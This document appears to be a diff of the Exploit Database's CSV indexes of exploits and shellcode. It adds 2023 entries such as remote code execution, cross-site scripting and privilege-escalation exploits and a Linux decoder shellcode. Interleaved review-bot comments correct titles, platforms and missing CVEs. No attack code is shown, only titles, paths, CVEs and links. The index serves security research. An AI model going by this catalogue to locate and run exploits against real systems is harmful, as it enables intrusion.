46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80,2019-04-09,2019-04-09,0,CVE-2019-6989,,,,,
48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,,2020-11-05,2020-11-05,0,CVE-2017-13772,,,,,
34184,exploits/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",remote,hardware,,2010-06-14,2014-07-28,1,,,,,,https://www.securityfocus.com/bid/41072/info
@ -4336,6 +4340,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48972,exploits/hardware/webapps/48972.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot",2020-10-29,"Mohammed Farhan",webapps,hardware,,2020-10-29,2020-10-29,0,,,,,,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,,2021-03-25,2021-03-25,0,,,,,,
37258,exploits/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure",2015-06-10,"Viktor Minin",webapps,hardware,,2015-06-10,2015-06-10,0,OSVDB-123189,,,,,
51179,exploits/hardware/webapps/51179.txt,"GeoVision Camera GV-ADR2701 - Authentication Bypass",2023-04-01,"Chan Nyein Wai",webapps,hardware,,2023-04-01,2023-04-01,0,,,,,,
50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - Local FIle Inclusion",2021-08-17,"Ken Pyle",webapps,hardware,,2021-08-17,2021-10-29,0,,,,,,
45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,,2018-07-22,2018-07-23,0,,Traversal,,,,
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80,2018-07-02,2018-07-02,0,,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt45000/screen-shot-2018-07-02-at-115352.png,,
@ -5253,6 +5258,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,,2018-04-09,2018-04-09,1,,,,,http://www.exploit-db.comh2-2017-06-10.zip,https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,,2021-01-06,2021-01-08,1,,,,,,
42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java,,2017-06-29,2017-06-30,1,CVE-2016-3088,,,,http://www.exploit-db.comapache-activemq-5.11.1-bin.zip,https://github.com/rapid7/metasploit-framework/blob/43d8c4c5e7450d46eba2f18e6e0b6ba70c6dc671/modules/exploits/multi/http/apache_activemq_upload_jsp.rb
51183,exploits/java/remote/51183.txt,"AD Manager Plus 7122 - Remote Code Execution (RCE)",2023-04-01,"Chan Nyein Wai",remote,java,,2023-04-01,2023-04-01,0,CVE-2021-44228,,,,,
39643,exploits/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,remote,java,8080,2016-03-31,2016-03-31,1,CVE-2016-0710;CVE-2016-0709,"Metasploit Framework (MSF)",,,,
50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",2021-12-14,kozmer,remote,java,,2021-12-14,2021-12-15,0,CVE-2021-44228,,,,,
50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",2021-12-14,leonjza,remote,java,,2021-12-14,2021-12-14,0,CVE-2021-44228,,,,,
@ -6860,6 +6866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19517,exploits/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",local,linux,,2012-07-01,2015-07-12,0,OSVDB-83766,,,,http://www.exploit-db.comemesene_2.12.3-dfsg-1ubuntu1_all.deb,
34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation",2010-08-26,"Micha Riser",local,linux,,2010-08-26,2019-03-28,1,CVE-2010-3073;OSVDB-68076,,,,,https://www.securityfocus.com/bid/42779/info
9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux,,2009-09-09,,1,,,2009-enlightenment.tgz,,,
51180,exploits/linux/local/51180.txt,"Enlightenment v0.25.3 - Privilege escalation",2023-04-01,nu11secur1ty,local,linux,,2023-04-01,2023-04-01,0,CVE-2022-37706,,,,,
1029,exploits/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Local Privilege Escalation",2005-06-04,Qnix,local,linux,,2005-06-03,2017-11-16,1,OSVDB-17145,,,,,
19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux,,1999-11-05,2012-07-05,1,OSVDB-83789,,,,,https://www.securityfocus.com/bid/774/info
22190,exploits/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",local,linux,,2003-01-21,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/6658/info
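Review bot: the new 51180 description, `Enlightenment v0.25.3 - Privilege escalation`, lowercases `escalation` while the neighbouring entries title-case the vulnerability class (e.g. `ePSXe 1.6.0 - 'nogui()' Local Privilege Escalation` on the next line); use `Privilege Escalation` so the index stays searchable by a consistent term.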
@ -8767,6 +8774,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46629,exploits/linux/webapps/46629.txt,"CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting",2019-03-29,DKM,webapps,linux,,2019-03-29,2019-03-29,0,CVE-2019-10261,"Cross-Site Scripting (XSS)",,,,
46669,exploits/linux/webapps/46669.txt,"CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting",2019-04-08,DKM,webapps,linux,,2019-04-08,2019-05-01,0,CVE-2019-10893,"Cross-Site Scripting (XSS)",,,,
46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux,,2019-05-01,2019-05-01,0,CVE-2019-11429,"Cross-Site Scripting (XSS)",,,,
51194,exploits/linux/webapps/51194.txt,"Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)",2023-04-01,"numan türle",webapps,linux,,2023-04-01,2023-04-01,0,CVE-2022-44877,,,,,
48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,,2020-03-13,2020-03-18,0,CVE-2020-10230,,,,,
41676,exploits/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,webapps,linux,,2017-03-23,2017-03-23,1,CVE-2014-3829;CVE-2014-3828,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/linux/http/centreon_sqli_exec.rb
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,,2018-08-14,2018-08-14,0,CVE-2018-14912,"Metasploit Framework (MSF)",,,,
@ -11449,6 +11457,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,,
44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",2021-09-06,Vulnz,webapps,multiple,,2021-09-06,2021-09-06,0,,,,,http://www.exploit-db.comantminer-monitor-0.5.0.zip,
51193,exploits/multiple/webapps/51193.py,"Apache 2.4.x - Buffer Overflow",2023-04-01,"Sunil Iyengar",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2021-44790,,,,,
49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,,
15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,,
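Review bot: the title `Apache 2.4.x - Buffer Overflow` on the new 51193 line is too vague to be useful in an index where every other Apache entry names the component; the line already carries CVE-2021-44790, so the affected module and the concrete version range from that CVE record belong in the description rather than the blanket `2.4.x`. Also reconsider `webapps,multiple` for a flaw in the httpd server itself; the `remote` type matches the server-side entries around it better than `webapps`.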
@ -11930,6 +11939,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,,
33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info
50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,,
51186,exploits/multiple/webapps/51186.txt,"perfSONAR v4.4.5 - Partial Blind CSRF",2023-04-01,"Ryan Moore",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2022-41413,,,,,
49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28092,,,,,
46316,exploits/multiple/webapps/46316.txt,"pfSense 2.4.4-p1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,,2019-02-04,2019-02-05,0,,"Cross-Site Scripting (XSS)",,,,
47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,,2019-10-01,2020-02-14,0,,,,,,https://github.com/mm0r1/exploits/blob/70835936612bceb93b268d1e9f761b84496610ed/php-json-bypass/exploit.php
@ -29872,6 +29882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1785,exploits/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,webapps,php,,2006-05-13,2017-11-22,1,OSVDB-25532;CVE-2006-2460,,,,,
24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"GulfTech Security",webapps,php,,2004-11-23,2018-01-05,1,"CVE-2004-1225;OSVDB-12229;BID: 11740;GTSA-00050",,,,,http://gulftech.org/advisories/SugarCRM%20Multiple%20Vulnerabilities/50
24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"GulfTech Security",webapps,php,,2004-11-23,2018-01-05,1,"CVE-2004-1227;OSVDB-12230;BID: 11740;GTSA-00050",,,,,http://gulftech.org/advisories/SugarCRM%20Multiple%20Vulnerabilities/50
51187,exploits/php/webapps/51187.py,"SugarCRM 12.2.0 - Remote Code Execution (RCE)",2023-04-01,sw33t.0day,webapps,php,,2023-04-01,2023-04-01,0,,,,,,
43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5715,,,,http://www.exploit-db.comSugarSuite-3.5.1.zip,
8949,exploits/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,webapps,php,,2009-06-14,,1,CVE-2009-2146;OSVDB-55089,,,,,http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
35467,exploits/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",webapps,php,,2011-03-15,2014-12-05,1,CVE-2011-0745;OSVDB-74888,,,,,https://www.securityfocus.com/bid/46885/info
@ -33598,6 +33609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30603,exploits/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,webapps,php,,2007-09-22,2013-12-31,1,CVE-2007-5060;OSVDB-40584,,,,,https://www.securityfocus.com/bid/25771/info
4802,exploits/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,webapps,php,,2007-12-27,,1,OSVDB-40276;CVE-2007-6604,,,,,
4813,exploits/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,webapps,php,,2007-12-29,,1,OSVDB-40277;CVE-2007-6652,,,,,
51184,exploits/php/webapps/51184.txt,"XCMS v1.83 - Remote Command Execution (RCE)",2023-04-01,Onurcan,webapps,php,,2023-04-01,2023-04-01,0,,,,,,
27797,exploits/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,webapps,php,,2006-05-02,2013-08-23,1,,,,,,https://www.securityfocus.com/bid/17781/info
36949,exploits/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php,5272,2015-05-08,2015-05-08,0,CVE-2015-3141;OSVDB-121847,,,,,
1459,exploits/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,webapps,php,,2006-01-29,2016-06-21,1,,,,,http://www.exploit-db.comxeCMS-RC2.7z,
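Review bot: the new 51184 line, `XCMS v1.83 - Remote Command Execution (RCE)`, sits directly under 4813, `XCMS 1.83 - Remote Command Execution`, which covers the same product and version and already carries `OSVDB-40277;CVE-2007-6652`. If 51184 is a re-issue of that flaw it should carry the same CVE in its codes column; if it is a different bug the description should say what distinguishes it (the affected script or parameter), otherwise the index now has two entries a reader cannot tell apart.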
@ -33852,6 +33864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8066,exploits/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,webapps,php,,2009-02-15,2017-02-13,1,OSVDB-52041,,,,,
44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,,2018-04-09,2018-04-09,0,CVE-2018-9238,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comtz_e.zip,
7131,exploits/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,webapps,php,,2008-11-15,2017-01-02,1,OSVDB-49906;CVE-2008-5490,,,,,
51198,exploits/php/webapps/51198.txt,"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)",2023-04-01,"SITE Team",webapps,php,,2023-04-01,2023-04-01,0,CVE-2022-48197,,,,,
13845,exploits/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,webapps,php,,2010-06-11,2016-10-27,0,CVE-2010-2336;CVE-2010-2335;CVE-2010-2334;CVE-2010-1300;OSVDB-65648;OSVDB-65479;OSVDB-63344,,,,http://www.exploit-db.comyamamah_v1.rar,
13849,exploits/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,webapps,php,,2010-06-11,,1,CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar,
11947,exploits/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php,,2010-03-29,,0,OSVDB-63344;CVE-2010-2335;CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar,
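Review bot: the new 51198 description writes `Cross Site Scripting` without the hyphen, whereas the rest of the index uses `Cross-Site Scripting` (see 44424 two lines above); normalise it. Also check the `php` platform: the Yahoo User Interface library named in the title is client-side JavaScript, so unless the proof of concept depends on a PHP-hosted page, `multiple` is the more accurate platform for a library-level flaw.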
@ -34274,6 +34287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",2022-04-26,Greenwolf,webapps,ruby,,2022-04-26,2022-05-11,0,CVE-2022-1175,,,,,
49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,,
51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-04-01,0,CVE-2022-2884,,,,,
42961,exploits/ruby/webapps/42961.txt,"Metasploit Web UI < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,,2017-10-08,2020-08-22,1,CVE-2017-15084,,,,,
39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443,2016-04-25,2016-04-25,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php
39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80,2016-06-21,2016-06-21,0,,,,,http://www.exploit-db.comradiant-1.1.3.tar.gz,
@ -35065,6 +35079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28232,exploits/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",dos,windows,,2006-07-17,2013-09-12,1,CVE-2006-3696;OSVDB-27353,,,,,https://www.securityfocus.com/bid/19026/info
11260,exploits/windows/dos/11260.py,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,dos,windows,,2010-01-25,,1,,,,,http://www.exploit-db.comSetup_AICAudioPlayer.exe,
3034,exploits/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,dos,windows,,2006-12-27,,1,OSVDB-32537;CVE-2006-6855,,,,,
51196,exploits/windows/dos/51196.txt,"AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)",2023-04-01,nu11secur1ty,dos,windows,,2023-04-01,2023-04-01,0,,,,,,
8837,exploits/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,dos,windows,,2009-05-31,,1,OSVDB-54812;CVE-2009-1944,,2009-aimp2_evil.mp3,,,
33640,exploits/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,dos,windows,,2010-02-12,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38215/info
9561,exploits/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,dos,windows,,2009-08-31,,1,OSVDB-58125;CVE-2009-3170,,,,http://www.exploit-db.comaimp_2.51.330.zip,
@ -40541,6 +40556,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40539,exploits/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,,2016-10-17,2016-10-19,1,,,,,http://www.exploit-db.comrc-setup.exe,
40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,,2016-09-30,2016-10-03,0,,,,,http://www.exploit-db.comNETGEARGenie-install.exe,
50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",2021-10-25,"Mert Daş",local,windows,,2021-10-25,2021-10-25,0,,,,,,
51199,exploits/windows/local/51199.c,"NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit",2023-04-01,"Neil Kettle",local,windows,,2023-04-01,2023-04-01,0,,,,,,
17223,exploits/windows/local/17223.pl,"NetOp Remote Control 8.0/9.1/9.2/9.5 - Local Buffer Overflow",2011-04-28,chap0,local,windows,,2011-04-28,2011-04-29,1,OSVDB-72291,,,,,
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,,2020-07-22,2020-07-22,0,,,,,,
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,,2019-03-11,2019-03-11,0,,,,,http://www.exploit-db.comnetsetman_setup_471.exe,
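Review bot: the new 51199 row's title and its classification disagree. `NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit` describes a remote exploit that yields root on Unix and SYSTEM on Windows, yet the row is filed as type `local` under `exploits/windows/local/51199.c` with platform `windows` and no port. If the exploit is network-reachable it belongs under `remote` with the port filled in, and the `root/SYSTEM` wording points at a `multiple` platform rather than `windows`. The description also breaks the title-case convention of the rows around it (`... - Local Buffer Overflow`, `... - Unquoted Service Path`); something like `NetIQ/Microfocus Performance Endpoint 5.1 - Remote Code Execution (root/SYSTEM)` would match. The codes column is empty, so please confirm whether a CVE exists before merging.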
@ -40953,6 +40969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,
49678,exploits/windows/local/49678.txt,"SOYAL 701 Server 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,
30681,exploits/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Local Privilege Escalation",2007-10-18,"Ruben Santamarta",local,windows,,2007-10-18,2014-01-06,1,CVE-2007-5633;OSVDB-41842,,,,,https://www.securityfocus.com/bid/26123/info
51182,exploits/windows/local/51182.txt,"Splashtop 8.71.12001.0 - Unquoted Service Path",2023-04-01,"A.I. hernandez",local,windows,,2023-04-01,2023-04-01,0,,,,,,
45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,,2018-07-23,2018-07-23,0,,,,,http://www.exploit-db.comssproeval512.exe,
45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows,,2018-07-23,2018-08-08,1,,,,,http://www.exploit-db.comssproeval512.exe,
17306,exploits/windows/local/17306.pl,"SpongeBob SquarePants Typing - Local Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",local,windows,,2011-05-18,2011-05-18,1,,,,http://www.exploit-db.com/screenshots/idlt17500/untitled.png,,
@ -45209,6 +45226,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,,2018-06-18,2018-06-19,0,,Traversal,,,,
34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80,2014-10-02,2014-10-02,0,CVE-2014-7226;OSVDB-112626,,,,http://www.exploit-db.comhfs2.3c.src.zip,
49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,,2020-11-30,2020-11-30,0,CVE-2014-6287,,,,,
51188,exploits/windows/webapps/51188.txt,"Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)",2023-04-01,"Mohammed A.Siledar",webapps,windows,,2023-04-01,2023-04-01,0,CVE-2022-30519,,,,,
44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,,2018-05-16,2018-05-16,0,CVE-2016-2279,,,,,
33428,exploits/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",webapps,windows,7002,2014-05-19,2014-05-27,1,CVE-2007-6483;OSVDB-42402,,,http://www.exploit-db.com/screenshots/idlt33500/screen-shot-2014-05-27-at-91059-am.png,http://www.exploit-db.comSentinel_Protection_Installer_7.4.0.exe,
16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",webapps,windows,,2011-01-26,2011-01-26,0,,,,,,


@ -180,6 +180,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,,irix,,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-141.php
43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,,irix,68,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-140.php
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,,irix,40,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-137.php
51191,shellcodes/linux/51191.txt,"FlipRotation v1.0 decoder - Shellcode (146 bytes)",2023-04-01,"Eduardo Silva",,linux,146,2023-04-01,2023-04-01,0,,,,,,
41375,shellcodes/linux/41375.c,"Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,,linux,156,2017-02-16,2017-07-11,0,,,,,,
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,,linux,37,2017-01-29,2017-07-11,0,,,,,,
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,,linux,62,2010-07-05,2010-07-05,1,,,,,,
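Review bot: 51191 is filed under the architecture-neutral `linux` platform in `shellcodes/linux/`, but the file added later in this commit is 64-bit only: its header says `Tested on: Linux x86_64 SMP Debian 4.19.260-1` and the decoder uses `rsi`, `rdi`, `rax` and a `rip`-relative `lea`, so it cannot run as 32-bit code. The other rows in this directory are the dual/multi-mode entries (`Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes)`), which is what `linux` without an architecture suffix signals; this row should get the x86-64 platform and directory, the same way its sibling 51189 in this commit is placed under `linux_x86`. The title `FlipRotation v1.0 decoder - Shellcode (146 bytes)` also drops the `Linux/... - ` prefix every neighbour uses and never says what the decoded payload does (the file's own example shows it dropping into a shell as `uid=1000`); the description should carry the platform prefix and name the payload the decoder unpacks.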
@ -569,6 +570,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,,linux_x86,185,2019-05-03,2019-05-23,0,,,,,,
